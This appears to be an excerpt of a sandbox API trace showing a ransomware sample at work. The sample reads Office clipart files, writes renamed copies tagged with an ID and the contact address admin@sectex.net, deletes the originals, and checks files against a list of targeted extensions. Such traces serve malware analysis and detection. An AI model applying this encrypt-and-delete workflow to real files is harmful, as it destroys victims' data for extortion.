	[0147.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.506] GetLastError () returned 0x0
	[0147.506] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x8b8, lpOverlapped=0x0) returned 1
	[0147.508] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0147.509] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.509] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.509] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.509] CloseHandle (hObject=0x3b8) returned 1
	[0147.509] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.509] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.511] CloseHandle (hObject=0x3ac) returned 1
	[0147.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf")) returned 1
	[0147.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.512] lstrlenW (lpString=".doc") returned 4
	[0147.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.512] lstrlenW (lpString=".docx") returned 5
	[0147.512] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.512] lstrlenW (lpString=".pdf") returned 4
	[0147.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.512] lstrlenW (lpString=".xls") returned 4
	[0147.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.512] lstrlenW (lpString=".xlsx") returned 5
	[0147.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.512] lstrlenW (lpString=".ppt") returned 4
	[0147.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.512] lstrlenW (lpString=".zip") returned 4
	[0147.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.513] lstrlenW (lpString=".rar") returned 4
	[0147.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString=".bz2") returned 4
	[0147.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString=".7z") returned 3
	[0147.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.513] lstrlenW (lpString=".dbf") returned 4
	[0147.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.513] lstrlenW (lpString=".1cd") returned 4
	[0147.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.513] lstrlenW (lpString=".jpg") returned 4
	[0147.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.513] lstrlenW (lpString=".doc") returned 4
	[0147.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString=".docx") returned 5
	[0147.513] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.513] lstrlenW (lpString=".pdf") returned 4
	[0147.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.513] lstrlenW (lpString=".xls") returned 4
	[0147.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.513] lstrlenW (lpString=".xlsx") returned 5
	[0147.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.513] lstrlenW (lpString=".ppt") returned 4
	[0147.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.514] lstrlenW (lpString=".zip") returned 4
	[0147.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.514] lstrlenW (lpString=".rar") returned 4
	[0147.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.514] lstrlenW (lpString=".bz2") returned 4
	[0147.514] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.514] lstrlenW (lpString=".7z") returned 3
	[0147.514] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.514] lstrlenW (lpString=".dbf") returned 4
	[0147.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.514] lstrlenW (lpString=".1cd") returned 4
	[0147.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63
	[0147.514] lstrlenW (lpString=".jpg") returned 4
	[0147.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.514] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.514] lstrlenW (lpString="HH00235_.WMF") returned 12
	[0147.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.515] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1026) returned 1
	[0147.515] CloseHandle (hObject=0x3ac) returned 1
	[0147.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf")) returned 0x20
	[0147.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.515] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.515] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.516] GetLastError () returned 0x0
	[0147.516] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x402, lpOverlapped=0x0) returned 1
	[0147.518] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x410, lpOverlapped=0x0) returned 1
	[0147.519] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.519] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.519] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.519] CloseHandle (hObject=0x3b8) returned 1
	[0147.519] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.519] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.521] CloseHandle (hObject=0x3ac) returned 1
	[0147.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.522] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf")) returned 1
	[0147.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.522] lstrlenW (lpString=".doc") returned 4
	[0147.522] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.522] lstrlenW (lpString=".docx") returned 5
	[0147.522] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.522] lstrlenW (lpString=".pdf") returned 4
	[0147.522] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString=".xls") returned 4
	[0147.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.523] lstrlenW (lpString=".xlsx") returned 5
	[0147.523] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.523] lstrlenW (lpString=".ppt") returned 4
	[0147.523] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString=".zip") returned 4
	[0147.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.523] lstrlenW (lpString=".rar") returned 4
	[0147.523] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString=".bz2") returned 4
	[0147.523] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString=".7z") returned 3
	[0147.523] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString=".dbf") returned 4
	[0147.523] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString=".1cd") returned 4
	[0147.523] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString=".jpg") returned 4
	[0147.523] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.523] lstrlenW (lpString=".doc") returned 4
	[0147.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.523] lstrlenW (lpString=".docx") returned 5
	[0147.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.523] lstrlenW (lpString=".pdf") returned 4
	[0147.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString=".xls") returned 4
	[0147.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.524] lstrlenW (lpString=".xlsx") returned 5
	[0147.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.524] lstrlenW (lpString=".ppt") returned 4
	[0147.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.524] lstrlenW (lpString=".zip") returned 4
	[0147.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.524] lstrlenW (lpString=".rar") returned 4
	[0147.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString=".bz2") returned 4
	[0147.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString=".7z") returned 3
	[0147.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.524] lstrlenW (lpString=".dbf") returned 4
	[0147.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.524] lstrlenW (lpString=".1cd") returned 4
	[0147.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63
	[0147.524] lstrlenW (lpString=".jpg") returned 4
	[0147.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.524] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.524] lstrlenW (lpString="HH00236_.WMF") returned 12
	[0147.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.525] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3286) returned 1
	[0147.525] CloseHandle (hObject=0x3ac) returned 1
	[0147.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf")) returned 0x20
	[0147.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.525] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.526] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.527] GetLastError () returned 0x0
	[0147.527] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xcd6, lpOverlapped=0x0) returned 1
	[0147.591] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xce0, lpOverlapped=0x0) returned 1
	[0147.592] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.592] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.592] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.592] CloseHandle (hObject=0x3b8) returned 1
	[0147.592] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.592] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.595] CloseHandle (hObject=0x3ac) returned 1
	[0147.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf")) returned 1
	[0147.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.685] lstrlenW (lpString=".doc") returned 4
	[0147.685] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.685] lstrlenW (lpString=".docx") returned 5
	[0147.685] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.685] lstrlenW (lpString=".pdf") returned 4
	[0147.685] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.685] lstrlenW (lpString=".xls") returned 4
	[0147.685] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.685] lstrlenW (lpString=".xlsx") returned 5
	[0147.685] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.685] lstrlenW (lpString=".ppt") returned 4
	[0147.685] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.685] lstrlenW (lpString=".zip") returned 4
	[0147.685] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.685] lstrlenW (lpString=".rar") returned 4
	[0147.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString=".bz2") returned 4
	[0147.686] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString=".7z") returned 3
	[0147.686] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString=".dbf") returned 4
	[0147.686] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString=".1cd") returned 4
	[0147.686] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString=".jpg") returned 4
	[0147.686] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString=".doc") returned 4
	[0147.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString=".docx") returned 5
	[0147.686] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.686] lstrlenW (lpString=".pdf") returned 4
	[0147.686] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString=".xls") returned 4
	[0147.686] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.686] lstrlenW (lpString=".xlsx") returned 5
	[0147.686] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.686] lstrlenW (lpString=".ppt") returned 4
	[0147.686] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.686] lstrlenW (lpString=".zip") returned 4
	[0147.686] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.686] lstrlenW (lpString=".rar") returned 4
	[0147.686] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.687] lstrlenW (lpString=".bz2") returned 4
	[0147.687] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.687] lstrlenW (lpString=".7z") returned 3
	[0147.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.687] lstrlenW (lpString=".dbf") returned 4
	[0147.687] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.687] lstrlenW (lpString=".1cd") returned 4
	[0147.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63
	[0147.687] lstrlenW (lpString=".jpg") returned 4
	[0147.687] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.687] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.687] lstrlenW (lpString="HH00524_.WMF") returned 12
	[0147.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.688] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14688) returned 1
	[0147.688] CloseHandle (hObject=0x31c) returned 1
	[0147.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf")) returned 0x20
	[0147.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.688] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.688] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
